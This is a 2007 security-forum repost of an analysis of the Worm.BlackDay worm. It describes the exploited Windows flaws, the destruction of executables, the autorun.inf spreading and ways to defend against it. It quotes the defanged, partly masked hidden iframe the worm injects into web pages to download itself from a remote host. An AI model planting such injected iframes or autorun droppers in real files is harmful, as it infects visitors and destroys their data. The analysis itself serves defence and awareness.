查看: 2343|回复: 0
收起左侧

專家談Worm.BlackDay蠕蟲病毒

[复制链接]
傻猪猪米走鸡
发表于 2007-5-8 14:25:21 | 显示全部楼层 |阅读模式
專家談Worm.BlackDay蠕蟲病毒

http://big5.ccidnet.com:89/gate/big5/security.ccidnet.com/art/1099/20070428/1072621_1.html

這個病毒會影響到除Windows Vista外所有的Windows版本。病毒程式運行後會破壞正常文件,感染網頁文件,通過MS06-014和MS07-017漏洞傳播, 且被病毒破壞的文件無法修復,這點比較危險。

當系統中毒後,所有可執行文件圖標都變成了一個黑色炸彈的icon,如下圖:

用戶一旦感染該病毒,電腦會自動彈出一個病毒作者的留言框:

病毒體內有如下字樣:
I can't change my sanguinary inbeing,never.I canfeel that the tears come by my face.Kill
my self is the best,maybe.so Please.
My Name:wswhacker My age:17
I feeling free when I am not in prison.Can you feel my word?

(但此段文字在不同的版本裏會有些許不同。)

3、該病毒會遍歷本地磁區、可移動磁碟等儲存介質,發現有*.asp *.aspx *.php *.jsp *.htm *.html擴展名的腳本文件時進行感染:

在這些網頁腳本文件中插入一個Iframe標簽,添加惡意網址引用:
(iframe src="hxxp://www.d***youxi.net/Black-Day.htm" width=0 height=0)(/iframe)
當用戶打開這些網頁文件時,IE就會自動下載蠕蟲病毒。

(既然病毒目標是所有本地磁片,掃毒時就要注意全電腦掃描。)

4、發現如下擴展名的文件時,將病毒體內容覆蓋到文件首部,使文件被破壞,無法恢復:
.exe .msc .dll .scr .pif .com
發現如下擴展名的文件時跳過:
.lnk
對於其他文件,當文件大小小于258048(病毒體大小)時,覆蓋文件,否則跳過。感染後的文件末尾加如下感染標誌:wswhacker。

5、在每個磁碟根目錄下創建如下病毒文件,雙擊磁區時激活病毒:
autorun.inf
BLACK-DAY.EXE

這樣就可以借助隨身碟、MP3、外接式硬碟等移動儲存介質傳播。

此病毒雖然對文件的破壞力比較強,好在傳染性一般。目前還沒有大規模的中毒報告。

建議開啟文件、網頁等監控,可以隨時監控病毒對上述文件實施的更改操作。插入移動儲存介質後,掃描移動磁片後再執行文件。

【提示:為安全起見,文中用“*”代替了部分網址,並更改了Iframe標簽格式。】
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-23 07:57 , Processed in 0.115509 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表